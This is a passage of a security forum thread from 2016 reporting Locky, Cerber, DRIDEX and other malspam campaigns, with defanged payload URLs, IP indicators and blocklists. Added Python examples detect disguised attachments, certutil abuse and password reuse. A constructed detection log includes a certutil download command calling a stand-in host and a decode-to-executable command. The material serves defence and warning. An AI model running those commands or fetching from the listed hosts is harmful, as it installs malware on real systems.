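On a real download of a few hundred kilobytes the offset loop is slow in pure Python; restrict the stub search to the first 4 KB, where the DOS stub always sits, and the cost becomes negligible. If the stub is missing (some packers strip it) the e_lfanew check still rejects false positives, but the key must then come from a different known plaintext, such as the "PE\0\0" bytes at a guessed e_lfanew.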


#1729 AplusWebMaster

Posted 31 May 2016 - 04:22 AM

FYI...

Fake 'Account Suspended' SPAM - delivers Locky
- https://myonlinesecu...delivers-locky/
31 May 2016 - "... an email with the subject of 'Fraudlent Behavior – Account Suspended' pretending to come from random senders with a zip attachment which downloads Locky ransomware...

Screenshot: https://myonlinesecu...ed-1024x447.png

31 May 2016: caution_ubmit_63883018.zip: Extracts to: details_AbSfS.js - Current Virus total detections 3/57*
.. MALWR** shows a download of Locky ransomware from
 http ://handmee .com/hIPTXx (VirusTotal 3/57***)... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464686472/

** https://malwr.com/an...jVmYWY3NzczNmM/
Hosts
134.0.10.15
93.170.123.60


*** https://www.virustot...sis/1464687464/
TCP connections
195.154.69.90

handmee .com: 134.0.10.15: https://www.virustot...15/information/
>> https://www.virustot...a2873/analysis/
___

Fake 'Proposal' SPAM - RTF attachment malware
- https://myonlinesecu...malware-macros/
31 May 2016 - "An email where the subject is the word 'FWD: ' or 'Fw: ' and the alleged sender's name pretending to come from random senders with a malicious word RTF doc spreadsheet attachment is another one from the current bot runs... The email looks like:
From: Blossom J. Evans <garry@ tierneyandco .com>
Date: Tue 31/05/2016 10:47
Subject:Fw:Blossom J. Evans
Attachment: r03va37cl81h.rtf
    The attached proposal includes declaration.
    Blossom J. Evans


31 May 2016: r03va37cl81h.rtf - Current Virus total detections 4/57*
.. Malwr** isn’t showing any download or dropped content. Payload Security*** shows a download from
 admiralty .co.za/jsckhr.jpg?TXnIQmQZO=59 (VirusTotal 3/57[4]) which should be converted-by-the-macro to an exe file (however Payload does not show any actual .exe file in the report)..
31 May 2016: u18c.rtf - Current Virus total detections 4/57[5]. Malwr[6] isn’t showing any download or dropped content. Payload Security[7] shows the same jpg download as the other rtf file... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1464688896/

** https://malwr.com/an...jUxNTE0OTg2MTQ/

*** https://www.hybrid-a...vironmentId=100
Contacted Hosts
41.72.154.148: https://www.virustot...48/information/

4] https://www.virustot...sis/1464690295/

5] https://www.virustot...sis/1464689088/

6] https://malwr.com/an...jUxNTE0OTg2MTQ/

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts
41.72.154.148

admiralty .co.za: 41.72.154.148
___

Fake 'New Message' SPAM - attachment leads to Locky
- http://blog.dynamoo....ew-message.html
31 May 2016 - "This -fake- financial spam has a malicious attachment:
    From:    Lanna Weall
    Date:    31 May 2016 at 12:18
    Subject:    New Message from your bank manager
    You have 1 new message from bank manager. To read it, please open the attachment down below.


In the sample I saw there was an attachment see_it_77235678.zip containing a malicious script warning_letter_Bdrh5W.js (detection rate 4/57*) and the Malwr analysis** of that sample shows that it downloads a binary from:
pvprojekt .pl/oLlqvX
The dropped binary is Locky ransomware with a detection rate of 4/56***. All those reports plus these analyses [1] [2] [3] show network traffic to:
85.17.19.102 (Leaseweb, Netherlands)
195.154.69.90 (Iliad Entreprises, France)
93.170.123.60 (PE Gornostay Mikhailo Ivanovich / time-host.net, Ukraine)
A trusted source (thank you) indicated that there was an earlier Locky campaign today...
Recommended blocklist:
85.17.19.102
195.154.69.90
93.170.123.60
"
* https://virustotal.c...7a77b/analysis/

** https://malwr.com/an...mNjNmYwNDAxNTk/
Hosts
193.107.88.86
85.17.19.102


*** https://virustotal.c...sis/1464694646/
TCP connections
195.154.69.90

1] https://malwr.com/an...jU3YWU1NTNlNDk/
Hosts
195.154.69.90

2] https://www.hybrid-a...vironmentId=100

3] https://sandbox.deep...858a943e7c6e7c/

- https://myonlinesecu...delivers-locky/
31 May 2016
Screenshot: https://myonlinesecu...er-1024x386.png
"... This one delivers the -same- Locky payload from the -same- sites in today’s earlier malspam run[1]..."
1] https://myonlinesecu...delivers-locky/
___

Fake 'New Company Order' SPAM - leads to malware
- http://blog.dynamoo....-order-abc.html
31 May 2016 - "This -fake- financial spam leads to malware:
    From:    accounting@ abcimportexport .com
    Reply-To:    userworldz@ yahoo .com
    To:    Recipients [accounting@ abcimportexport .com]
    Date:    31 May 2016 at 12:31
    Subject:    New Company Order
    Good Day,
    Find the attached specifications in the purchase order for our company mid year order & projects before sending your Proforma Invoice and do get back to me with your quotations asap.
    An Official order placement will follow as soon as possible.
    CLICK HERE TO DOWNLOAD & VIEW PURCHASE ORDER IF DOESNT WORK THEN CLICK
 HERE TO DOWNLOAD SECURE PURCHASE ORDER ...
ABC Import & Export,LLC 2534 Royal Lane
Suite # 205
Dallas,Texas 75229
USA ...


The link in the email message goes to gallery.mailchimp .com/4dcdbc9b7e95edf6788be6723/files/scan_purchase_orders.zip . This contains a malicious executable scan purchase orders.exe which has a detection rate of 3/56*. That VirusTotal report and these other analyses [1] [2].. shows network traffic to:
185.5.175.211 (Voxility SRL, Romania)
This executable drops another similar EXE [4] [5].. which phones home to the same IP. Between them, these reports indicate some sort of keylogger. There seems to be little if anything of value in this /24, so I would recommend blocking 185.5.175.0/24 "
* https://virustotal.c...sis/1464698175/
TCP connections
185.5.175.211

1] https://malwr.com/an...WY4MDc2ODMzOGE/
Hosts
185.5.175.211

2] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.5.175.211

4] https://virustotal.c...fe1a6/analysis/
TCP connections
185.5.175.211

5] https://malwr.com/an...zJiNGE5OTUyZjE/
Hosts
185.5.175.211
___

Fake 'Lottery Ticket' SPAM - downloads Locky
- https://myonlinesecu...leads-to-locky/
31 May 2016 - "... email from the Locky gang with the subject of 'Lottery Ticket #71088492' [random numbered] pretending to come from random senders with a zip attachment which downloads Locky ransomware... One of the emails looks like:
From: Jesse Amis <AmisJesse74004@ sabanet .ir>
Date: Tue 31/05/2016 15:34
Subject: Lottery Ticket #71088492
Attachment: warning_71088492.zip
    The e-version of your lottery ticket is enclosed to this e-mail.


31 May 2016: warning_71088492.zip: Extracts to: scanned_doc_Ay9bE.js - Current Virus total detections 8/57*
.. MALWR** shows a download of Locky from
 http ://lizdion .net/9cRXIl (VirusTotal ***), which is the -same- Locky ransomware version that has been used all day... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464705905/

** https://malwr.com/an...WJmMzU3NjU3ZjM/
Hosts
97.74.158.1
93.170.123.60


*** https://www.virustot...sis/1464706206/
TCP connections
195.154.69.90

lizdion .net: 97.74.158.1: https://www.virustot....1/information/
>> https://www.virustot...658c2/analysis/
___

Crypto-ransomware attacks Win7 and later ...
- http://blog.trendmic...-compatibility/
May 31, 2016 - "... new ZCRYPT ransomware family*... family only targets systems with newer versions of Windows, specifically Windows 7 and later:
* https://www.trendmic...ransom_zcrypt.a
... It makes the usual threats of deleting the files if the victim doesn’t pay up within a week. Ransom is set at 1.2 BTC (approximately 500 US dollars), with the ransom going up to 5 BTC (approximately 2,200 US dollars) after four days. The ransom note looks like this:
> https://blog.trendmi...6/05/zcrypt.png
... According to our analysis, it fails to either encrypt the files properly or display the ransom note when launched in an older version of Windows, such as Windows XP. The malware calls a function which does not exist in earlier versions of Windows; this breaks-it for the older operating systems... this particular family also tried to spread via USB flash disks: it plants a copy of itself onto removable drives.
This is relatively unusual in crypto-ransomware... The threat actor also enjoyed free anonymity because the domain registration masked the actual identity of registrant. The C&C domain is already tagged “canceled, suspended, refused, or reserved”.
Industry Practices: Backing up is still the best defense against crypto-ransomware; the 3-2-1 rule ensures that users still have a copy of their data even if they are affected by similar threats. We strongly advise against paying the ransom; this only ensures that the threat will continue to become bigger..."
>> https://www.trendmic...ware/index.html
 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 31 May 2016 - 09:42 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
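Several of the items above (the .js inside warning_71088492.zip that fetches Locky, the scan purchase orders.exe inside scan_purchase_orders.zip) only work because Windows hides known extensions and the user sees a "document". As an added example, not code from any of the quoted blogs, here is a small Python inspector that opens a ZIP attachment in memory and flags members three ways: by a script or executable extension, by a document-looking double extension such as .pdf.exe, and by content (an MZ header means a Windows executable whatever the name says). The archive it inspects is constructed to resemble the attachments named in the posts; the extension lists are an assumption and should be widened to local policy.

```python
"""Inspect a ZIP e-mail attachment for script/executable payloads hiding behind
document-looking names (added example; the member names are constructed to
resemble those in the posts, the extension lists are an assumption)."""
import io
import os
import zipfile

# Extensions that Windows Script Host or the shell runs on double-click.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1"}
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".dll", ".msi"}
# Extensions a user expects to be harmless documents or images.
DOC_EXTS = {".doc", ".docx", ".pdf", ".jpg", ".jpeg", ".png", ".xls", ".xlsx", ".txt"}


def classify_member(name, head):
    """Return the reasons one archive member looks dangerous ([] = nothing found).

    name is the member path inside the archive, head its first two bytes.
    """
    reasons = []
    base = os.path.basename(name.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext in SCRIPT_EXTS:
        reasons.append("script extension " + ext)
    elif ext in EXEC_EXTS:
        reasons.append("executable extension " + ext)
    elif ext == ".zip":
        reasons.append("nested archive")
    # report.pdf.exe: with known extensions hidden, Explorer shows "report.pdf".
    inner_ext = os.path.splitext(stem)[1].lower()
    if inner_ext in DOC_EXTS and ext not in DOC_EXTS:
        reasons.append("double extension " + inner_ext + ext)
    # Content beats names: an MZ header is a Windows executable whatever it is called.
    if head.startswith(b"MZ") and ext not in EXEC_EXTS:
        reasons.append("PE header under non-executable name")
    return reasons


def risky_members(zip_bytes):
    """Map member name -> reasons for every suspicious member of the archive."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)
            reasons = classify_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip():
    """Constructed archive mimicking the attachments described in the posts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("warning_71088492/scanned_doc_Ay9bE.js",
                    "var sh = new ActiveXObject('WScript.Shell'); // inert stand-in")
        zf.writestr("Check_Copy_Void.scr", b"MZ\x90\x00" + b"\x00" * 60)
        zf.writestr("scan purchase orders.exe", b"MZ\x90\x00")
        zf.writestr("scanned_doc.jpg", b"MZ\x90\x00")   # PE hiding behind an image name
        zf.writestr("report.pdf.exe", b"MZ")
        zf.writestr("quote.pdf", b"%PDF-1.4 constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for name, why in sorted(risky_members(build_sample_zip()).items()):
        print(name, "->", "; ".join(why))
```

A mail gateway would call risky_members() on each ZIP attachment and quarantine on any finding; the content check is the one that survives renaming, so keep it even if you relax the extension lists.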


#1730 AplusWebMaster


Posted 01 June 2016 - 06:21 AM

FYI...

Fake 'ACH Bank account' SPAM - delivers Cerber ransomware
- https://myonlinesecu...ber-ransomware/
31 May 2016 - "An email with the subject of 'ACH – Bank account information form' pretending to come from Ali Bolton <Ali.Bolton@ jpmchase .com> with a zip attachment which downloads Cerber ransomware... One of the emails looks like:
From: Ali Bolton <Ali.Bolton@ jpmchase .com>
Date: Tue 31/05/2016 21:29
Subject: ACH – Bank account information form
Attachment: Check_Copy_Void.zip
    Please fill out and return the attached ACH form along with a copy of a voided check.
    Ali Bolton,
    JPMorgan Chase
    GRE Project Accounting
    Vendor Management & Bid/Supervisor ...


31 May 2016: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr - Current Virus total detections 5/57*
.. Payload security** doesn’t show any download location of any further malware but the network section shows a connection to ipinfo .io and -16386- hosts which is a definite indication of Cerber ransomware.
MALWR*** doesn’t show anything interesting and is only mentioned for other researchers to download the sample. Whoever uploaded at Payload Security declined to share the sample... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464726882/

** https://www.hybrid-a...vironmentId=100

*** https://malwr.com/an...WUwNTg0OTU3ZWU/

ipinfo .io: 52.3.78.30: https://www.virustot...30/information/
>> https://www.virustot...80842/analysis/
54.84.252.139: https://www.virustot...39/information/
>> https://www.virustot...6e375/analysis/
54.88.175.149: https://www.virustot...49/information/
>> https://www.virustot...80842/analysis/
___

DRIDEX Poses as Fake Certificate in Latest Spam Run
- http://blog.trendmic...ke-certificate/
Jun 1, 2016 - "... we observed a sudden spike in DRIDEX–related spam emails after its seeming ‘hiatus.’ This spam campaign mostly affected users in the United States, Brazil, China, Germany, and Japan:
> https://blog.trendmi...countries-2.jpg
...  Instead of the usual -fake- invoice or notification baits, DRIDEX plays on people’s fears of having their accounts compromised. Besides the change in email subjects, DRIDEX also has new tricks... On top of its macro usage, it also leverages Certutil*, a type of command-line program in relation to certificate services to pass it off as a legitimate certificate. These two elements (use of macros and Certutil) combined together can add to DRIDEX’s prevalence and pose challenges to detection...
* https://technet.micr...3(v=ws.11).aspx
... Despite DRIDEX’s prevalence, users and organizations can take simple preventive measures such as not opening attachments or enabling macros when you receive emails from unknown sources. When you get emails about compromised accounts, first check and verify the source... enterprises can create policies that will block off email messages with attachments from unknown sources..."
(More detail at the trendmicro URL above.)
___

Windows 0-day vuln for sale ...
- https://www.trustwav...for-the-Masses/
May 31, 2016 - "... a zero day being offered-for-sale stood out among the other offerings in an underground market for Russian-speaking cyber criminals. This specific forum serves as a collaboration platform where one can hire malware coders, lease an exploit kit, buy web shells for compromised websites, or even rent a whole botnet for any purpose... The zero day in question claims to be a Local Privilege Escalation (LPE) vulnerability in Windows... We have notified Microsoft of the zero day offering and we continue to monitor the situation. We plan to update this blog post should we come across any new information."
> https://www.helpnets...ro-day-exploit/
___

APWG - Phishing Trends Report - Q1 2016
> https://apwg.org/apw...nter/APWG-News/
May 23 2016: "APWG releases its Phishing Trends Report for Q1 2016:
Some Key Findings in this report:
• The Retail/Service sector remained the most- targeted industry sector during the first quarter of 2016, with 42.71% of attacks.
• The number of brands targeted by phishers in the first quarter remained constant – ranging from 406 to 431 brands each month.
• The United States continued its position at the top of the list of nations hosting phishing websites.
• In Q1 2016, 20 million -new- malware samples were captured.*
• The world's most-infected countries are led by China, where 57.24% of computers are infected, followed by Taiwan (49.15%) and Turkey at 42.52%."
> PDF/Full report: https://docs.apwg.or...ort_q1_2016.pdf

* https://www.av-test....istics/malware/
See "Total Malware" - charted
 



Edited by AplusWebMaster, 01 June 2016 - 02:14 PM.

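The DRIDEX item above describes certutil.exe, a legitimate certificate tool, being used by a macro to turn a dropped "certificate" into the real payload. That is easy to spot in process-creation telemetry because legitimate certutil runs do not normally come from wscript.exe or WINWORD.EXE, do not use -decode, and do not write .pif or .exe files. As an added example (not code from Trend Micro or the forum), here is a Python scorer over process-creation events. The log lines are constructed in a Sysmon-like CSV layout with parent image, image and command line; the certutil switches named are real, the parent list and scoring weights are an assumption.

```python
"""Flag certutil.exe being used as a decoder/downloader in process-creation logs
(added example: the log lines are constructed in a Sysmon-like CSV layout)."""
import csv
import io
import re

# Parents from which certutil.exe rarely runs for a legitimate reason (assumption).
SCRIPT_PARENTS = {"wscript.exe", "cscript.exe", "winword.exe", "excel.exe",
                  "powershell.exe", "mshta.exe", "cmd.exe"}
# Real certutil switches that make it a file decoder or a downloader.
DECODE_SWITCHES = {"-decode", "-decodehex", "-encode"}
DOWNLOAD_SWITCHES = {"-urlcache", "-verifyctl"}
EXEC_EXTS = (".exe", ".pif", ".scr", ".dll", ".com", ".bat", ".cmd")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # quoted argument or bare word

# Constructed events: one benign store query, a script-spawned decode to a .pif,
# a download via -urlcache, a Word-spawned decode, and a service doing a verify.
SAMPLE_LOG = r"""ParentImage,Image,CommandLine
C:\Windows\explorer.exe,C:\Windows\System32\certutil.exe,"certutil -store My"
C:\Windows\System32\wscript.exe,C:\Windows\System32\certutil.exe,"certutil -decode C:\Users\bob\AppData\Local\Temp\cert.pfx C:\Users\bob\AppData\Local\Temp\upd.pif"
C:\Windows\System32\cmd.exe,C:\Windows\System32\certutil.exe,"certutil -urlcache -split -f http://example.invalid/a.exe C:\Users\bob\a.exe"
C:\Program Files\Microsoft Office\WINWORD.EXE,C:\Windows\System32\certutil.exe,"certutil -decode note.txt note.txt.out"
C:\Windows\System32\services.exe,C:\Windows\System32\certutil.exe,"certutil -verifystore Root"
"""


def score_event(parent_image, image, cmdline):
    """Score one process-creation event; (0, []) means certutil was not involved
    or nothing about the invocation looked like payload handling."""
    if not image.lower().endswith("certutil.exe"):
        return 0, []
    parent = parent_image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    args = tokens[1:]                                   # drop the program name
    switches = {"-" + t[1:].lower() for t in args if t and t[0] in "-/"}
    score, reasons = 0, []
    if switches & DECODE_SWITCHES:
        score += 2
        reasons.append("decode/encode switch")
    if switches & DOWNLOAD_SWITCHES:
        score += 2
        reasons.append("download switch")
    if parent in SCRIPT_PARENTS:
        score += 2
        reasons.append("spawned by " + parent)
    if any(t.lower().endswith(EXEC_EXTS) for t in args):
        score += 1
        reasons.append("executable file argument")
    if re.search(r"https?://", cmdline, re.IGNORECASE):
        score += 1
        reasons.append("URL on command line")
    return score, reasons


def flag_certutil_abuse(log_text, threshold=4):
    """Return [(score, reasons, cmdline)] for events scoring at or above threshold."""
    hits = []
    for row in csv.DictReader(io.StringIO(log_text)):
        score, reasons = score_event(row["ParentImage"], row["Image"], row["CommandLine"])
        if score >= threshold:
            hits.append((score, reasons, row["CommandLine"]))
    return hits


if __name__ == "__main__":
    for score, reasons, cmdline in flag_certutil_abuse(SAMPLE_LOG):
        print(score, "|", ", ".join(reasons), "|", cmdline)
```

The threshold of 4 means a decode or download switch alone is not enough; it has to pair with an unusual parent, an executable output name or a URL, which keeps administrators running certutil -decode by hand out of the alert queue.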


#1731 AplusWebMaster


Posted 02 June 2016 - 07:20 AM

FYI...

IC3 Warns of Extortion Email Schemes
- https://www.us-cert....n-Email-Schemes
June 01, 2016 - "The Internet Crime Complaint Center (IC3) has issued an alert on extortion schemes that relate to recent high-profile data thefts. Fraudsters often use the news release of high-profile data breaches to scare victims into clicking-on-a-link or paying a ransom.
US-CERT encourages users and administrators to review the IC3 Alert* for details and refer to US-CERT Tip ST04-014** for information on social engineering and phishing attacks."
* https://www.ic3.gov/...016/160601.aspx
June 01, 2016 - "The Internet Crime Complaint Center (IC3) continues to receive reports from individuals who have received extortion attempts via e-mail related to recent high-profile data thefts. The recipients are told that personal information, such as their name, phone number, address, credit card information, and other personal details, will be released to the recipient's social media contacts, family, and friends if a ransom is not paid. The recipient is instructed to pay in Bitcoin, a virtual currency that provides a high degree of anonymity to the transactions. The recipients are typically given a short deadline. The ransom amount ranges from 2 to 5 bitcoins or approximately $250 to $1,200..."
 
** https://www.us-cert....s/tips/ST04-014
 





#1732 AplusWebMaster


Posted 03 June 2016 - 03:31 AM

FYI...

Fake 'PayPal' SPAM - malware delivery
- https://myonlinesecu...livers-malware/
3 June 2016 - "An email with the subject of 'Spam2Ls Suspicious activity on your PayPal Account' pretending to come from PayPal <service@ intl.paypal .com> with a -link- in the email that when -clicked- downloads password-stealing malware. At first, I thought this was a typical badly done phishing attempt, but no! This is a genuine malware delivery attempt... the link in the email http ://188.120.230.100 /paypal/report.pdf- and note the – after the pdf... Of course it is -not- a PDF but delivers report.exe. I am being told that this is a version of LATENT BOT:
- https://www.fireeye....t_trace_me.html

188.120.230.100: https://www.virustot...00/information/
>>  https://www.virustot...6110b/analysis/

Update: a -second- run of this email with the subject just saying: 'Suspicious activity on your PayPal Account' and contains a link to http ://188.120.225.210 /paypal/report.pdf-

188.120.225.210: https://www.virustot...10/information/
>> https://www.virustot...31348/analysis/

Screenshot: https://myonlinesecu...nt-1024x399.png

3 June 2016: report.exe - Current Virus total detections 9/56*
.. MALWR** ... Payload Security*** ... shows interesting connections where this malware posts files to a webserver and downloads various data and zip files. All the zip files I tried, were not actually zip files but encrypted data... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464928075/

** https://malwr.com/an...GY1NzJhYjAyZDE/
Hosts
107.161.145.159

*** https://www.reverse....vironmentId=100
Contacted Hosts
107.161.145.159: https://www.virustot...59/information/
>> https://www.virustot...24d15/analysis/
___

More Tech Support Scams
- https://www.ic3.gov/...016/160602.aspx
June 2, 2016 - "The Internet Crime Complaint Center (IC3) is receiving an increase in complaints related to technical support scams, where the subject claims to be an employee (or an affiliate) of a major computer software or security company offering technical support to the victim. Recent complaints indicate some subjects are claiming to be support for cable and Internet companies to offer assistance with digital cable boxes and connections, modems, and routers. The subject claims the company has received notifications of errors, viruses, or security issues from the victim's internet connection. Subjects are also claiming to work on behalf of government agencies to resolve computer viruses and threats from possible foreign countries or terrorist organizations. From January 1, 2016, through April 30, 2016, the IC3 received 3,668 complaints with adjusted losses of $2,268,982...
Technical Details ...
Variations and Trends ...
Additional Threats ...
Defense and Mitigation ..."
(More detail at the ic3 URL above.)
___

Apple - all services resume after outage
- http://www.reuters.c...n-idUSKCN0YO2R3
Jun 3, 2016 - "Apple Inc said all its services, including the popular App Store, have resumed following an outage that started late afternoon on Thursday. Apple's U.S. web page showed* all applications had resumed as of 11:55 p.m. Eastern Daylight Time (0355 GMT)... services related to iCloud and the Photos application have also resumed..."
* https://www.apple.co...t/systemstatus/
 



Edited by AplusWebMaster, 04 June 2016 - 05:15 AM.



#1733 AplusWebMaster


Posted 06 June 2016 - 04:28 PM

FYI...

Angler EK now evades EMET on Win7 ...
- https://www.fireeye....ploit_kite.html
June 06, 2016 - "We recently encountered some exploits from Angler Exploit Kit (EK) that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7. Angler EK uses complex multi-layered code obfuscation and leverages multiple exploits...
Conclusion: The level of sophistication in exploit kits has increased significantly throughout the years. Where obfuscation and new zero days were once the only additions in the development cycle, evasive code has now been observed being embedded into the framework and shellcode.
Remediation guidance: Although there are no quick solutions for the DEP, EAF, and EAF+ evasion techniques, organizations can mitigate this threat through a robust vulnerability management program for end user systems, which includes the installation of security updates for third party software. Applications such as Adobe Flash, web browsers, and Oracle Java should be patched routinely, prioritizing critical patches, or removed if possible. Because the web browser plays an important role in the infection process, disabling browser plugins for Flash or Silverlight may also reduce the browser attack surface."

- http://arstechnica.c...microsoft-emet/
Jun 6, 2016 - "... there's nothing stopping Angler from using the EMET evasions to install other malicious applications..."
___

Malvertising - DoubleClick Ad Fraud
- https://blog.malware...click-ad-fraud/
June 6, 2016 - "Malvertising isn’t only used to infect users via drive-by downloads or to deceitfully push fake-software-updates. A campaign currently going on via the -TrafficHolder- adult ad platform leverages the promise of raunchy videos to lure people into ad fraud. The trick is simple and yet effective. While browsing, users are automatically redirected to what appears to be YouTube for adult content. The page looks completely normal, except for the fact that it is a giant image slapped across an actual ‘normal’ WordPress website. To the naked eye the large JPEG or GIF looks legit, and curious visitors may be tempted to push the Play button to watch the saucy movie. Rather than playing any content, this click is used to launch a real and paid advert via Google’s DoubleClick. This technique referred to as ‘clickjacking’ is very popular and can take different forms while the end goal remains to generate legitimate-looking clicks on adverts:
> https://blog.malware...6/06/Flow__.png
The crooks are using hundreds of what appear to be -bogus- (insurance, loans and other scams) WordPress sites to carry out this fraudulent scheme. A simple layer is added on top of the page to give this optical illusion. JavaScript code is able to track mouse movements and knows if the user has actually clicked on the advert... The fake adult image (which covers the whole page) is dynamically generated on the fly and a new one is retrieved randomly from a remote server (5.39.99.215)... that image will disappear after a few seconds of inactivity to reveal the actual underlying WordPress site. The majority of the sites we found were highly suspicious and most likely used for hosting various other spammy content. When users click to play the -bogus- video, their action triggers the ad fraud component of this scam by abusing Google’s DoubleClick... In this particular malvertising instance, users are not put at risk with malicious code, they are simply being duped so that the crooks behind this can generate ad money for each click. However, we have also observed redirections to exploit kits via the same ad platform (TrafficHolder) so you should be extra vigilant and use a proactive line of defence such as exploit protection to avoid getting infected. We have reported this ad fraud to Google and will keep monitoring the situation as one can expect those rogue actors to come up with a different plan to monetize low quality traffic."

5.39.99.215: https://www.virustot...15/information/
___

Password Re-user? Get Ready to Get Busy
- http://krebsonsecuri...et-to-get-busy/
June 6, 2016 - "In the wake of megabreaches at some of the Internet’s most-recognized destinations, don’t be surprised if you receive password-reset-requests from numerous companies that didn’t experience a breach:
Some big name companies — including Facebook and Netflix — are in the habit of combing through huge data leak troves for credentials that match those of their customers and then forcing a password reset for those users. Netflix .com, for example, sent out a notification late last week to users who made the mistake of re-using their Netflix password at Linkedin, Tumblr or MySpace. All three of those breaches are years old, but the scope of the intrusions (more than a half -billion- usernames and passwords leaked in total) only became apparent recently when the credentials were posted online at various sites and services:
>> http://krebsonsecuri...ce-580x1031.png
... Netflix is taking this step because it knows from experience that -cybercriminals-will- be using the credentials leaked from Tumblr, MySpace and LinkedIn to see if they work on a variety of third-party sites (including Netflix)... Facebook* also has been known to mine-data-leaked in major external password breaches for any signs that users are re-using their passwords at the hacked entity."
* http://krebsonsecuri...r-adobe-breach/
 



Edited by AplusWebMaster, 07 June 2016 - 04:33 AM.



#1734 AplusWebMaster


Posted 07 June 2016 - 07:54 AM

FYI...

LinkedIn breach data Used for Malicious E-Mails
- https://isc.sans.edu...l?storyid=21139
2016-06-07 - "Yesterday, the German federal CERT (CERT-BUND) warned of phishing e-mails that are made more plausible by using data that appears to originate from the recently leaked LinkedIn data set. The e-mails address the recipient by full name and job title. Typically, the attachments claim to contain an invoice. We have since heard from a couple of users who reported receiving e-mails that match the pattern. For example:
> https://isc.sans.edu... 8_44_56 AM.png
The e-mails arrive in different languages. They address the recipient by full name, job title and company name, to make the e-mail more plausible. This is similar to the way social media was used in the past to create more convincing phishing e-mails. For example, see this old article from 3 years ago* about how Facebook data is used in this way. With the LinkedIn leak, data has become available that wasn't reachable by simple screen scrapers (or API users) in the past."
* https://isc.sans.edu...l?storyid=15265
2013-02-25
___

TeamViewer confirms number of abused user accounts is “significant”
- http://arstechnica.c...s-account-hack/
Jun 5, 2016 - "It was a tough week for TeamViewer, a service that allows computer professionals and consumers to log into their computers from remote locations. For a little more than a month, a growing number of users have reported their accounts were accessed by criminals who used their highly privileged position to drain PayPal and bank accounts. Critics have speculated TeamViewer itself has fallen victim to a breach that's making the mass hacks possible. On Sunday, TeamViewer spokesman Axel Schmidt acknowledged to Ars that the number of takeovers was 'significant', but he continued to maintain that the compromises are the result of user passwords that were compromised through a cluster of recently exposed megabreaches involving more than 642 million passwords belonging to users of LinkedIn, MySpace, and other services..."

- http://www.zdnet.com...ck-significant/
"... If you think you may have been involved in the breach, check HaveIbeenPwned* and change your passwords as soon as possible..."
* https://haveibeenpwned.com/
 



Edited by AplusWebMaster, 07 June 2016 - 11:03 AM.

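The Krebs item and the TeamViewer item above both come down to the same check: take a leaked dump, find the records for your own customers, and see whether the leaked password is the one they use with you. As an added example, not code from Netflix, Facebook or any of the quoted sites, here is the matching step in Python. It assumes the dump holds plaintext passwords (as a cracked dump does) and that your store holds only salted PBKDF2 hashes, so each candidate has to be re-hashed; the user store, the "leak" and the iteration count are all constructed for the example.

```python
"""Comb a leaked credential dump for passwords re-used on our own service and
queue the matching accounts for a forced reset (added example; the user store
and the 'leak' below are constructed, nobody's real data)."""
import hashlib
import hmac
import os

ITERATIONS = 100_000          # PBKDF2 work factor; an assumption for this example


def hash_password(password, salt=None):
    """Return (salt, pbkdf2_sha256_digest) for a new or an existing salt."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def verify(password, salt, digest):
    """Constant-time comparison of a candidate password against a stored hash."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


# Constructed user store: e-mail -> (salt, digest). Only hashes are held, never plaintext.
USERS = {email: hash_password(pw) for email, pw in [
    ("alice@example.com", "correct horse battery staple"),
    ("bob@example.com", "Summer2016!"),
    ("carol@example.com", "hunter2"),
]}

# Constructed dump records as a cracked leak would present them: e-mail, plaintext.
LEAK = [
    ("alice@example.com", "letmein"),       # different password: no action
    ("BOB@Example.com", "Summer2016!"),     # same password re-used: force a reset
    ("carol@example.com", "hunter2"),       # re-used: force a reset
    ("dave@example.com", "hunter2"),        # not a customer: ignore
    ("carol@example.com", "hunter3"),       # second record for carol, does not match
]


def accounts_to_reset(leak, users):
    """Sorted e-mails of customers whose leaked password verifies against their stored hash.

    Only records for e-mails we actually hold are hashed (PBKDF2 is slow by design),
    each (e-mail, candidate) pair is tried once, and an account already flagged is skipped.
    """
    hits, tried = set(), set()
    for raw_email, leaked_pw in leak:
        email = raw_email.strip().lower()
        if email not in users or email in hits or (email, leaked_pw) in tried:
            continue
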